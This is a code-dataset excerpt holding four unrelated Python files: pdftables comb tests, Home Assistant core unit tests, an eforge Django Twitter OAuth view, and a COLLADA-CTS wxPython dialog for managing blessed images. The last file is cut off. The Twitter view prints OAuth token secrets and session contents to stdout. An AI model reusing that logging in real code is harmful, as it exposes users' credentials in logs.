repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
pombredanne/pdftables | test/test_comb.py | 1 | 1990 | #!/usr/bin/env python
# ScraperWiki Limited
# Ian Hopkinson, 2013-06-17
# -*- coding: utf-8 -*-
"""
comb tests
"""
import sys
sys.path.append('code')
from pdftables import (comb, comb_extend,
comb_from_uppers_and_lowers,
find_minima)
from nose.tools import assert_equals, raises
def test_find_minima_works_in_simplest_case():
projection = {5:2,6:1,7:2}
assert_equals(6,find_minima(7, 5, projection=projection))
def test_find_minima_function_copes_with_multiple_values_at_minima():
pass
def test_an_ascending_comb_is_extended_correctly():
combarray = [2, 3, 4]
assert_equals(
[1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0, 10.0],
comb_extend(combarray, 0.1, 10.5))
def test_a_descending_comb_is_extended_correctly():
combarray = [5, 4, 3]
assert_equals(comb_extend(combarray, 0.1, 8), [7, 6, 5, 4, 3, 2, 1])
def test_it_returns_minus_one_for_values_below_comb():
combarray = [0, 1, 2, 3, 4, 5]
assert_equals(comb(combarray, -1), -1)
def test_it_returns_minus_one_for_values_above_comb():
combarray = [0, 1, 2, 3, 4, 5]
assert_equals(comb(combarray, 6), -1)
def test_it_returns_correct_index_comb_ascending():
combarray = [0, 1, 2, 3, 4, 5]
assert_equals(comb(combarray, 0.5), 0)
assert_equals(comb(combarray, 1.5), 1)
assert_equals(comb(combarray, 4.5), 4)
def test_it_returns_correct_index_comb_descending():
combarray = [5, 4, 3, 2, 1, 0]
assert_equals(comb(combarray, 0.5), 4)
assert_equals(comb(combarray, 1.5), 3)
assert_equals(comb(combarray, 4.5), 0)
def test_comb_correctly_created_from_uppers_and_lowers():
uppers = [100, 80, 60, 40, 20]
lowers = [86, 66, 46, 26, 6]
assert_equals(comb_from_uppers_and_lowers(uppers, lowers),
[100, 83, 63, 43, 23, 6])
@raises(Exception)
def test_raises_an_exception_for_an_unsorted_combarray():
combarray = [5, 3, 4, 2, 1, 0]
comb(combarray, 0.5)
| bsd-2-clause | 6,833,236,781,541,763,000 | 26.638889 | 72 | 0.622613 | false |
srcLurker/home-assistant | tests/test_core.py | 1 | 23404 | """Test to verify that Home Assistant core works."""
# pylint: disable=protected-access
import asyncio
import unittest
from unittest.mock import patch, MagicMock
from datetime import datetime, timedelta
import pytz
import homeassistant.core as ha
from homeassistant.exceptions import InvalidEntityFormatError
from homeassistant.util.async import (
run_callback_threadsafe, run_coroutine_threadsafe)
import homeassistant.util.dt as dt_util
from homeassistant.util.unit_system import (METRIC_SYSTEM)
from homeassistant.const import (
__version__, EVENT_STATE_CHANGED, ATTR_FRIENDLY_NAME, CONF_UNIT_SYSTEM)
from tests.common import get_test_home_assistant
PST = pytz.timezone('America/Los_Angeles')
def test_split_entity_id():
"""Test split_entity_id."""
assert ha.split_entity_id('domain.object_id') == ['domain', 'object_id']
def test_async_add_job_schedule_callback():
"""Test that we schedule coroutines and add jobs to the job pool."""
hass = MagicMock()
job = MagicMock()
ha.HomeAssistant.async_add_job(hass, ha.callback(job))
assert len(hass.loop.call_soon.mock_calls) == 1
assert len(hass.loop.create_task.mock_calls) == 0
assert len(hass.add_job.mock_calls) == 0
@patch('asyncio.iscoroutinefunction', return_value=True)
def test_async_add_job_schedule_coroutinefunction(mock_iscoro):
"""Test that we schedule coroutines and add jobs to the job pool."""
hass = MagicMock()
job = MagicMock()
ha.HomeAssistant.async_add_job(hass, job)
assert len(hass.loop.call_soon.mock_calls) == 0
assert len(hass.loop.create_task.mock_calls) == 1
assert len(hass.add_job.mock_calls) == 0
@patch('asyncio.iscoroutinefunction', return_value=False)
def test_async_add_job_add_threaded_job_to_pool(mock_iscoro):
"""Test that we schedule coroutines and add jobs to the job pool."""
hass = MagicMock()
job = MagicMock()
ha.HomeAssistant.async_add_job(hass, job)
assert len(hass.loop.call_soon.mock_calls) == 0
assert len(hass.loop.create_task.mock_calls) == 0
assert len(hass.loop.run_in_executor.mock_calls) == 1
def test_async_run_job_calls_callback():
"""Test that the callback annotation is respected."""
hass = MagicMock()
calls = []
def job():
calls.append(1)
ha.HomeAssistant.async_run_job(hass, ha.callback(job))
assert len(calls) == 1
assert len(hass.async_add_job.mock_calls) == 0
def test_async_run_job_delegates_non_async():
"""Test that the callback annotation is respected."""
hass = MagicMock()
calls = []
def job():
calls.append(1)
ha.HomeAssistant.async_run_job(hass, job)
assert len(calls) == 0
assert len(hass.async_add_job.mock_calls) == 1
class TestHomeAssistant(unittest.TestCase):
"""Test the Home Assistant core classes."""
# pylint: disable=invalid-name
def setUp(self):
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
# pylint: disable=invalid-name
def tearDown(self):
"""Stop everything that was started."""
self.hass.stop()
# This test hangs on `loop.add_signal_handler`
# def test_start_and_sigterm(self):
# """Start the test."""
# calls = []
# self.hass.bus.listen_once(EVENT_HOMEASSISTANT_START,
# lambda event: calls.append(1))
# self.hass.start()
# self.assertEqual(1, len(calls))
# self.hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP,
# lambda event: calls.append(1))
# os.kill(os.getpid(), signal.SIGTERM)
# self.hass.block_till_done()
# self.assertEqual(1, len(calls))
def test_pending_sheduler(self):
"""Add a coro to pending tasks."""
call_count = []
@asyncio.coroutine
def test_coro():
"""Test Coro."""
call_count.append('call')
for i in range(50):
self.hass.add_job(test_coro())
run_coroutine_threadsafe(
asyncio.wait(self.hass._pending_tasks, loop=self.hass.loop),
loop=self.hass.loop
).result()
with patch.object(self.hass.loop, 'call_later') as mock_later:
run_callback_threadsafe(
self.hass.loop, self.hass._async_tasks_cleanup).result()
assert mock_later.called
assert len(self.hass._pending_tasks) == 0
assert len(call_count) == 50
def test_async_add_job_pending_tasks_coro(self):
"""Add a coro to pending tasks."""
call_count = []
@asyncio.coroutine
def test_coro():
"""Test Coro."""
call_count.append('call')
for i in range(50):
self.hass.add_job(test_coro())
assert len(self.hass._pending_tasks) == 50
self.hass.block_till_done()
assert len(call_count) == 50
def test_async_add_job_pending_tasks_executor(self):
"""Run a executor in pending tasks."""
call_count = []
def test_executor():
"""Test executor."""
call_count.append('call')
for i in range(40):
self.hass.add_job(test_executor)
assert len(self.hass._pending_tasks) == 40
self.hass.block_till_done()
assert len(call_count) == 40
def test_async_add_job_pending_tasks_callback(self):
"""Run a callback in pending tasks."""
call_count = []
@ha.callback
def test_callback():
"""Test callback."""
call_count.append('call')
for i in range(40):
self.hass.add_job(test_callback)
assert len(self.hass._pending_tasks) == 0
self.hass.block_till_done()
assert len(call_count) == 40
class TestEvent(unittest.TestCase):
"""A Test Event class."""
def test_eq(self):
"""Test events."""
now = dt_util.utcnow()
data = {'some': 'attr'}
event1, event2 = [
ha.Event('some_type', data, time_fired=now)
for _ in range(2)
]
self.assertEqual(event1, event2)
def test_repr(self):
"""Test that repr method works."""
self.assertEqual(
"<Event TestEvent[L]>",
str(ha.Event("TestEvent")))
self.assertEqual(
"<Event TestEvent[R]: beer=nice>",
str(ha.Event("TestEvent",
{"beer": "nice"},
ha.EventOrigin.remote)))
def test_as_dict(self):
"""Test as dictionary."""
event_type = 'some_type'
now = dt_util.utcnow()
data = {'some': 'attr'}
event = ha.Event(event_type, data, ha.EventOrigin.local, now)
expected = {
'event_type': event_type,
'data': data,
'origin': 'LOCAL',
'time_fired': now,
}
self.assertEqual(expected, event.as_dict())
class TestEventBus(unittest.TestCase):
"""Test EventBus methods."""
# pylint: disable=invalid-name
def setUp(self):
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.bus = self.hass.bus
# pylint: disable=invalid-name
def tearDown(self):
"""Stop down stuff we started."""
self.hass.stop()
def test_add_remove_listener(self):
"""Test remove_listener method."""
self.hass.allow_pool = False
old_count = len(self.bus.listeners)
def listener(_): pass
unsub = self.bus.listen('test', listener)
self.assertEqual(old_count + 1, len(self.bus.listeners))
# Remove listener
unsub()
self.assertEqual(old_count, len(self.bus.listeners))
# Should do nothing now
unsub()
def test_unsubscribe_listener(self):
"""Test unsubscribe listener from returned function."""
calls = []
@ha.callback
def listener(event):
"""Mock listener."""
calls.append(event)
unsub = self.bus.listen('test', listener)
self.bus.fire('test')
self.hass.block_till_done()
assert len(calls) == 1
unsub()
self.bus.fire('event')
self.hass.block_till_done()
assert len(calls) == 1
def test_listen_once_event_with_callback(self):
"""Test listen_once_event method."""
runs = []
@ha.callback
def event_handler(event):
runs.append(event)
self.bus.listen_once('test_event', event_handler)
self.bus.fire('test_event')
# Second time it should not increase runs
self.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(1, len(runs))
def test_listen_once_event_with_coroutine(self):
"""Test listen_once_event method."""
runs = []
@asyncio.coroutine
def event_handler(event):
runs.append(event)
self.bus.listen_once('test_event', event_handler)
self.bus.fire('test_event')
# Second time it should not increase runs
self.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(1, len(runs))
def test_listen_once_event_with_thread(self):
"""Test listen_once_event method."""
runs = []
def event_handler(event):
runs.append(event)
self.bus.listen_once('test_event', event_handler)
self.bus.fire('test_event')
# Second time it should not increase runs
self.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(1, len(runs))
def test_thread_event_listener(self):
"""Test a event listener listeners."""
thread_calls = []
def thread_listener(event):
thread_calls.append(event)
self.bus.listen('test_thread', thread_listener)
self.bus.fire('test_thread')
self.hass.block_till_done()
assert len(thread_calls) == 1
def test_callback_event_listener(self):
"""Test a event listener listeners."""
callback_calls = []
@ha.callback
def callback_listener(event):
callback_calls.append(event)
self.bus.listen('test_callback', callback_listener)
self.bus.fire('test_callback')
self.hass.block_till_done()
assert len(callback_calls) == 1
def test_coroutine_event_listener(self):
"""Test a event listener listeners."""
coroutine_calls = []
@asyncio.coroutine
def coroutine_listener(event):
coroutine_calls.append(event)
self.bus.listen('test_coroutine', coroutine_listener)
self.bus.fire('test_coroutine')
self.hass.block_till_done()
assert len(coroutine_calls) == 1
class TestState(unittest.TestCase):
"""Test State methods."""
def test_init(self):
"""Test state.init."""
self.assertRaises(
InvalidEntityFormatError, ha.State,
'invalid_entity_format', 'test_state')
def test_domain(self):
"""Test domain."""
state = ha.State('some_domain.hello', 'world')
self.assertEqual('some_domain', state.domain)
def test_object_id(self):
"""Test object ID."""
state = ha.State('domain.hello', 'world')
self.assertEqual('hello', state.object_id)
def test_name_if_no_friendly_name_attr(self):
"""Test if there is no friendly name."""
state = ha.State('domain.hello_world', 'world')
self.assertEqual('hello world', state.name)
def test_name_if_friendly_name_attr(self):
"""Test if there is a friendly name."""
name = 'Some Unique Name'
state = ha.State('domain.hello_world', 'world',
{ATTR_FRIENDLY_NAME: name})
self.assertEqual(name, state.name)
def test_dict_conversion(self):
"""Test conversion of dict."""
state = ha.State('domain.hello', 'world', {'some': 'attr'})
self.assertEqual(state, ha.State.from_dict(state.as_dict()))
def test_dict_conversion_with_wrong_data(self):
"""Test conversion with wrong data."""
self.assertIsNone(ha.State.from_dict(None))
self.assertIsNone(ha.State.from_dict({'state': 'yes'}))
self.assertIsNone(ha.State.from_dict({'entity_id': 'yes'}))
def test_repr(self):
"""Test state.repr."""
self.assertEqual("<state happy.happy=on @ 1984-12-08T12:00:00+00:00>",
str(ha.State(
"happy.happy", "on",
last_changed=datetime(1984, 12, 8, 12, 0, 0))))
self.assertEqual(
"<state happy.happy=on; brightness=144 @ "
"1984-12-08T12:00:00+00:00>",
str(ha.State("happy.happy", "on", {"brightness": 144},
datetime(1984, 12, 8, 12, 0, 0))))
class TestStateMachine(unittest.TestCase):
"""Test State machine methods."""
# pylint: disable=invalid-name
def setUp(self):
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.states = self.hass.states
self.states.set("light.Bowl", "on")
self.states.set("switch.AC", "off")
# pylint: disable=invalid-name
def tearDown(self):
"""Stop down stuff we started."""
self.hass.stop()
def test_is_state(self):
"""Test is_state method."""
self.assertTrue(self.states.is_state('light.Bowl', 'on'))
self.assertFalse(self.states.is_state('light.Bowl', 'off'))
self.assertFalse(self.states.is_state('light.Non_existing', 'on'))
def test_is_state_attr(self):
"""Test is_state_attr method."""
self.states.set("light.Bowl", "on", {"brightness": 100})
self.assertTrue(
self.states.is_state_attr('light.Bowl', 'brightness', 100))
self.assertFalse(
self.states.is_state_attr('light.Bowl', 'friendly_name', 200))
self.assertFalse(
self.states.is_state_attr('light.Bowl', 'friendly_name', 'Bowl'))
self.assertFalse(
self.states.is_state_attr('light.Non_existing', 'brightness', 100))
def test_entity_ids(self):
"""Test get_entity_ids method."""
ent_ids = self.states.entity_ids()
self.assertEqual(2, len(ent_ids))
self.assertTrue('light.bowl' in ent_ids)
self.assertTrue('switch.ac' in ent_ids)
ent_ids = self.states.entity_ids('light')
self.assertEqual(1, len(ent_ids))
self.assertTrue('light.bowl' in ent_ids)
def test_all(self):
"""Test everything."""
states = sorted(state.entity_id for state in self.states.all())
self.assertEqual(['light.bowl', 'switch.ac'], states)
def test_remove(self):
"""Test remove method."""
events = []
@ha.callback
def callback(event):
events.append(event)
self.hass.bus.listen(EVENT_STATE_CHANGED, callback)
self.assertIn('light.bowl', self.states.entity_ids())
self.assertTrue(self.states.remove('light.bowl'))
self.hass.block_till_done()
self.assertNotIn('light.bowl', self.states.entity_ids())
self.assertEqual(1, len(events))
self.assertEqual('light.bowl', events[0].data.get('entity_id'))
self.assertIsNotNone(events[0].data.get('old_state'))
self.assertEqual('light.bowl', events[0].data['old_state'].entity_id)
self.assertIsNone(events[0].data.get('new_state'))
# If it does not exist, we should get False
self.assertFalse(self.states.remove('light.Bowl'))
self.hass.block_till_done()
self.assertEqual(1, len(events))
def test_case_insensitivty(self):
"""Test insensitivty."""
runs = []
@ha.callback
def callback(event):
runs.append(event)
self.hass.bus.listen(EVENT_STATE_CHANGED, callback)
self.states.set('light.BOWL', 'off')
self.hass.block_till_done()
self.assertTrue(self.states.is_state('light.bowl', 'off'))
self.assertEqual(1, len(runs))
def test_last_changed_not_updated_on_same_state(self):
"""Test to not update the existing, same state."""
state = self.states.get('light.Bowl')
future = dt_util.utcnow() + timedelta(hours=10)
with patch('homeassistant.util.dt.utcnow', return_value=future):
self.states.set("light.Bowl", "on", {'attr': 'triggers_change'})
self.hass.block_till_done()
state2 = self.states.get('light.Bowl')
assert state2 is not None
assert state.last_changed == state2.last_changed
def test_force_update(self):
"""Test force update option."""
events = []
@ha.callback
def callback(event):
events.append(event)
self.hass.bus.listen(EVENT_STATE_CHANGED, callback)
self.states.set('light.bowl', 'on')
self.hass.block_till_done()
self.assertEqual(0, len(events))
self.states.set('light.bowl', 'on', None, True)
self.hass.block_till_done()
self.assertEqual(1, len(events))
class TestServiceCall(unittest.TestCase):
"""Test ServiceCall class."""
def test_repr(self):
"""Test repr method."""
self.assertEqual(
"<ServiceCall homeassistant.start>",
str(ha.ServiceCall('homeassistant', 'start')))
self.assertEqual(
"<ServiceCall homeassistant.start: fast=yes>",
str(ha.ServiceCall('homeassistant', 'start', {"fast": "yes"})))
class TestServiceRegistry(unittest.TestCase):
"""Test ServicerRegistry methods."""
# pylint: disable=invalid-name
def setUp(self):
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.services = self.hass.services
@ha.callback
def mock_service(call):
pass
self.services.register("Test_Domain", "TEST_SERVICE", mock_service)
# pylint: disable=invalid-name
def tearDown(self):
"""Stop down stuff we started."""
self.hass.stop()
def test_has_service(self):
"""Test has_service method."""
self.assertTrue(
self.services.has_service("tesT_domaiN", "tesT_servicE"))
self.assertFalse(
self.services.has_service("test_domain", "non_existing"))
self.assertFalse(
self.services.has_service("non_existing", "test_service"))
def test_services(self):
"""Test services."""
expected = {
'test_domain': {'test_service': {'description': '', 'fields': {}}}
}
self.assertEqual(expected, self.services.services)
def test_call_with_blocking_done_in_time(self):
"""Test call with blocking."""
calls = []
@ha.callback
def service_handler(call):
"""Service handler."""
calls.append(call)
self.services.register("test_domain", "register_calls",
service_handler)
self.assertTrue(
self.services.call('test_domain', 'REGISTER_CALLS', blocking=True))
self.assertEqual(1, len(calls))
def test_call_non_existing_with_blocking(self):
"""Test non-existing with blocking."""
prior = ha.SERVICE_CALL_LIMIT
try:
ha.SERVICE_CALL_LIMIT = 0.01
assert not self.services.call('test_domain', 'i_do_not_exist',
blocking=True)
finally:
ha.SERVICE_CALL_LIMIT = prior
def test_async_service(self):
"""Test registering and calling an async service."""
calls = []
@asyncio.coroutine
def service_handler(call):
"""Service handler coroutine."""
calls.append(call)
self.services.register('test_domain', 'register_calls',
service_handler)
self.assertTrue(
self.services.call('test_domain', 'REGISTER_CALLS', blocking=True))
self.hass.block_till_done()
self.assertEqual(1, len(calls))
def test_callback_service(self):
"""Test registering and calling an async service."""
calls = []
@ha.callback
def service_handler(call):
"""Service handler coroutine."""
calls.append(call)
self.services.register('test_domain', 'register_calls',
service_handler)
self.assertTrue(
self.services.call('test_domain', 'REGISTER_CALLS', blocking=True))
self.hass.block_till_done()
self.assertEqual(1, len(calls))
class TestConfig(unittest.TestCase):
"""Test configuration methods."""
# pylint: disable=invalid-name
def setUp(self):
"""Setup things to be run when tests are started."""
self.config = ha.Config()
self.assertIsNone(self.config.config_dir)
def test_path_with_file(self):
"""Test get_config_path method."""
self.config.config_dir = '/tmp/ha-config'
self.assertEqual("/tmp/ha-config/test.conf",
self.config.path("test.conf"))
def test_path_with_dir_and_file(self):
"""Test get_config_path method."""
self.config.config_dir = '/tmp/ha-config'
self.assertEqual("/tmp/ha-config/dir/test.conf",
self.config.path("dir", "test.conf"))
def test_as_dict(self):
"""Test as dict."""
self.config.config_dir = '/tmp/ha-config'
expected = {
'latitude': None,
'longitude': None,
CONF_UNIT_SYSTEM: METRIC_SYSTEM.as_dict(),
'location_name': None,
'time_zone': 'UTC',
'components': [],
'config_dir': '/tmp/ha-config',
'version': __version__,
}
self.assertEqual(expected, self.config.as_dict())
class TestAsyncCreateTimer(object):
"""Test create timer."""
@patch('homeassistant.core.asyncio.Event')
@patch('homeassistant.core.dt_util.utcnow')
def test_create_timer(self, mock_utcnow, mock_event, event_loop):
"""Test create timer fires correctly."""
hass = MagicMock()
now = mock_utcnow()
event = mock_event()
now.second = 1
mock_utcnow.reset_mock()
ha._async_create_timer(hass)
assert len(hass.bus.async_listen_once.mock_calls) == 2
start_timer = hass.bus.async_listen_once.mock_calls[1][1][1]
event_loop.run_until_complete(start_timer(None))
assert hass.loop.create_task.called
timer = hass.loop.create_task.mock_calls[0][1][0]
event.is_set.side_effect = False, False, True
event_loop.run_until_complete(timer)
assert len(mock_utcnow.mock_calls) == 1
assert hass.loop.call_soon.called
event_type, event_data = hass.loop.call_soon.mock_calls[0][1][1:]
assert ha.EVENT_TIME_CHANGED == event_type
assert {ha.ATTR_NOW: now} == event_data
stop_timer = hass.bus.async_listen_once.mock_calls[0][1][1]
stop_timer(None)
assert event.set.called
| mit | -2,077,596,494,842,952,200 | 30.499327 | 79 | 0.587079 | false |
oshepherd/eforge | eforge/update/twitter/views.py | 1 | 3164 | # -*- coding: utf-8 -*-
# EForge project management system, Copyright © 2010, Element43
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
from eforge.models import Project
from django.shortcuts import redirect, render_to_response
from django.template import RequestContext
from django.core.urlresolvers import reverse
from django.conf import settings
from django.contrib.sites.models import Site
from eforge.decorators import project_page, has_project_perm
from eforge.update.twitter.models import Token
from twitter import Twitter, OAuth, TwitterHTTPError
import urlparse
consumer_key = settings.TWITTER_CONSUMER_KEY
consumer_secret = settings.TWITTER_CONSUMER_SECRET
authorize_url = 'https://api.twitter.com/oauth/authorize?oauth_token=%s'
def abs_reverse(*args, **kwargs):
domain = "http://%s" % Site.objects.get_current().domain
return urlparse.urljoin(domain, reverse(*args, **kwargs))
@project_page
@has_project_perm('eforge.manage')
def setup(request, project):
twitter = Twitter(
auth=OAuth('', '', consumer_key, consumer_secret),
format='', secure=True,)
tokens = urlparse.parse_qs(
twitter.oauth.request_token(
oauth_callback=abs_reverse('twitter-callback', args=[project.slug])
))
print tokens
request.session['oauth_secret'] = tokens['oauth_token_secret'][0]
return redirect(authorize_url % tokens['oauth_token'][0])
@project_page
@has_project_perm('eforge.manage')
def callback(request, project):
oauth_token = request.GET['oauth_token']
oauth_verifier = request.GET['oauth_verifier']
oauth_secret = request.session['oauth_secret']
print request.session.items()
twitter = Twitter(
auth=OAuth(oauth_token, oauth_secret, consumer_key, consumer_secret),
format='', secure=True,)
try:
tokens = urlparse.parse_qs(
twitter.oauth.access_token(oauth_verifier=oauth_verifier))
except TwitterHTTPError, e:
print e
raise
try:
token = Token.objects.get(project=project)
except Token.DoesNotExist:
token = Token(project=project)
token.token = tokens['oauth_token'][0]
token.token_secret = tokens['oauth_token_secret'][0]
token.user = tokens['screen_name'][0]
token.save()
return render_to_response('twitter/done.html', {
'name': tokens['screen_name'][0]
}, context_instance=RequestContext(request)) | isc | 3,334,641,479,672,096,000 | 35.790698 | 79 | 0.702498 | false |
KhronosGroup/COLLADA-CTS | Core/Gui/Dialog/FBlessedViewerDialog.py | 1 | 11440 | # Copyright (c) 2012 The Khronos Group Inc.
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and /or associated documentation files (the "Materials "), to deal in the Materials without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Materials, and to permit persons to whom the Materials are furnished to do so, subject to
# the following conditions:
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Materials.
# THE MATERIALS ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE MATERIALS OR THE USE OR OTHER DEALINGS IN THE MATERIALS.
import wx
import os
import os.path
import shutil
import Core.Common.FUtils as FUtils
from Core.Common.FConstants import *
from Core.Gui.Dialog.FImageSizer import *
class FBlessedViewerDialog(wx.Dialog):
def __init__(self, parent, dataSetPath):
wx.Dialog.__init__(self, parent, wx.ID_ANY,
"Blessed Viewer", size = wx.Size(540, 450),
style = wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER)
sizer = wx.BoxSizer()
self.SetSizer(sizer)
window = wx.SplitterWindow(self)
window.SetSashGravity(0.5)
window.SetMinimumPaneSize(20)
images = FBlessedImagesPanel(window, dataSetPath)
names = FBlessedNamesPanel(window, dataSetPath, images)
window.SplitVertically(names, images, 200)
sizer.Add(window, 1, wx.EXPAND | wx.ALL, 0)
class FBlessedNamesPanel(wx.Panel):
def __init__(self, parent, dataSetPath, imagesPanel):
wx.Panel.__init__(self, parent, style = wx.BORDER_SUNKEN)
self.__dataSetPath = dataSetPath
self.__imagesPanel = imagesPanel
self.__imagesPanel.SetChangeCallback(self.__Update)
self.__defaultBlessedImageFilename = ""
sizer = wx.BoxSizer(wx.VERTICAL)
self.SetSizer(sizer)
# UI: Add a label for the default blessed image filename.
defaultBlessedLabel = wx.StaticText(self, wx.ID_ANY, " Default Blessed")
sizer.Add(defaultBlessedLabel, 0, wx.ALIGN_LEFT | wx.ALL, 2)
# UI: Add a text box with the default blessed image filename at the top.
self.__defaultImageTextBox = wx.TextCtrl(self, wx.ID_ANY, style = wx.TE_READONLY)
sizer.Add(self.__defaultImageTextBox, 0, wx.EXPAND | wx.ALL, 2)
sizer.Add((1, 5), 0)
# UI: Add a label for the blessed images list box.
imageLabel = wx.StaticText(self, wx.ID_ANY, " Blessed Images/Animations")
sizer.Add(imageLabel, 0, wx.ALIGN_LEFT | wx.ALL, 2)
# UI: Add a list box containing all the bless image filenames.
self.__imageListBox = wx.ListBox(self, style = wx.LB_SINGLE | wx.LB_HSCROLL)
self.Bind(wx.EVT_LISTBOX, self.__ImageOnClick, self.__imageListBox)
sizer.Add(self.__imageListBox, 1, wx.EXPAND | wx.ALL, 2)
self.__Update(False)
# returns [(imageName, imagePath),]
def __GetImageList(self):
blessedImages = []
blessedDir = os.path.join(self.__dataSetPath, BLESSED_DIR)
if (os.path.isdir(blessedDir)):
for ext in os.listdir(blessedDir):
if (ext[0] == "."): continue # mostly for .svn folders
if (ext == BLESSED_EXECUTIONS): continue
extBlessedDir = os.path.join(blessedDir, ext)
if (os.path.isdir(extBlessedDir)):
for filename in os.listdir(extBlessedDir):
fullFilename = os.path.join(extBlessedDir, filename)
if (os.path.isfile(fullFilename)):
blessedImages.append((filename, fullFilename))
return blessedImages
# returns [(animationName, [imagePath1,]), ]
def __GetAnimationList(self):
blessedAnimations = []
blessedDir = os.path.join(self.__dataSetPath, BLESSED_DIR, BLESSED_ANIMATIONS)
if (os.path.isdir(blessedDir)):
for directory in os.listdir(blessedDir):
if (directory[0] == "."): continue # mostly for .svn folders
fullDirectory = os.path.join(blessedDir, directory)
storedFilenames = []
for filename in os.listdir(fullDirectory):
fullFilename = os.path.join(fullDirectory, filename)
if (os.path.isfile(fullFilename)):
storedFilenames.append(fullFilename)
storedFilenames.sort()
blessedAnimations.append((directory, storedFilenames))
return blessedAnimations
def __Update(self, onlyDefaultBless):
# Update the default blessed image filename.
defaultContainerFilename = os.path.join(self.__dataSetPath, BLESSED_DIR, BLESSED_DEFAULT_FILE)
if (os.path.isfile(defaultContainerFilename)):
blessFile = open(defaultContainerFilename, "rb")
filename = blessFile.readline().strip()
blessFile.close()
if (filename.find(BLESSED_ANIMATIONS) == -1): # Image?
filename = os.path.basename(filename)
else:
filename = os.path.basename(os.path.dirname(filename))
self.__defaultImageTextBox.SetLabel(filename)
else:
self.__defaultImageTextBox.SetLabel("")
if onlyDefaultBless: return
# Update the image filenames list box.
self.__imageListBox.Clear()
for name, image in self.__GetImageList():
self.__imageListBox.Append("[I] " + name, [image])
for name, images in self.__GetAnimationList():
self.__imageListBox.Append("[A] " + name, images)
# Restart the images panel
if (self.__imageListBox.GetCount() > 0):
self.__imageListBox.Select(0)
self.__imagesPanel.SetImage(self.__imageListBox.GetClientData(0))
else:
self.__imagesPanel.Clear()
def __ImageOnClick(self, e):
e.Skip()
selection = self.__imageListBox.GetSelection()
if (selection == -1): return
self.__imagesPanel.SetImage(self.__imageListBox.GetClientData(selection))
class FBlessedImagesPanel(wx.Panel):
def __init__(self, parent, dataSetPath):
wx.Panel.__init__(self, parent, style = wx.BORDER_SUNKEN)
self.__filenames = None
self.__callback = None
self.__animationSizer = None
self.__dataSetPath = dataSetPath
sizer = wx.BoxSizer(wx.VERTICAL)
self.SetSizer(sizer)
self.Clear()
sizer.Layout()
def Clear(self):
sizer = self.GetSizer()
# for some reason Clear() does not destroy the static box
if (self.__animationSizer != None):
sizer.Detach(self.__animationSizer)
self.__animationSizer.DeleteWindows()
self.__animationSizer.GetStaticBox().Destroy()
self.__animationSizer = None
self.GetSizer().Clear(True)
self.GetSizer().Layout()
def SetImage(self, filenames):
sizer = self.GetSizer()
self.Clear()
self.__filenames = filenames
self.__animationSizer = FImageSizer(self, wx.EmptyString, filenames, None)
sizer.Add(self.__animationSizer, 0, wx.ALIGN_CENTER | wx.ALL, 2)
buttonSizer = wx.BoxSizer(wx.HORIZONTAL)
sizer.Add(buttonSizer, 0, wx.ALIGN_CENTER | wx.ALL, 2)
button = wx.Button(self, wx.ID_ANY, "Delete")
buttonSizer.Add(button, 0, wx.ALIGN_CENTER | wx.ALL, 2)
self.Bind(wx.EVT_BUTTON, self.__OnUnbless, button)
button = wx.Button(self, wx.ID_ANY, "Default Bless")
buttonSizer.Add(button, 0, wx.ALIGN_CENTER | wx.ALL, 2)
self.Bind(wx.EVT_BUTTON, self.__OnMakeDefault, button)
buttonSizer.Layout()
sizer.Layout()
def SetChangeCallback(self, callback):
self.__callback = callback
def __OnUnbless(self, e):
e.Skip()
# Delete the blessed image files.
for filename in self.__filenames:
os.remove(filename)
foundFile = False
for element in os.listdir(os.path.dirname(filename)):
if (element != ".svn"):
foundFile = True
break
if (not foundFile):
deleteDirectory = os.path.abspath(os.path.dirname(filename))
try:
shutil.rmtree(deleteDirectory)
except OSError, e:
FUtils.ShowWarning(self, "Unable to delete " + deleteDirectory + ".\n" +
"Error:\n" + str(e) + "\n Please delete directory manually.")
# Verify whether this was the blessed images. In that case: clear the file.
blessedDir = os.path.join(self.__dataSetPath, BLESSED_DIR)
defaultContainerFilename = os.path.join(blessedDir, BLESSED_DEFAULT_FILE)
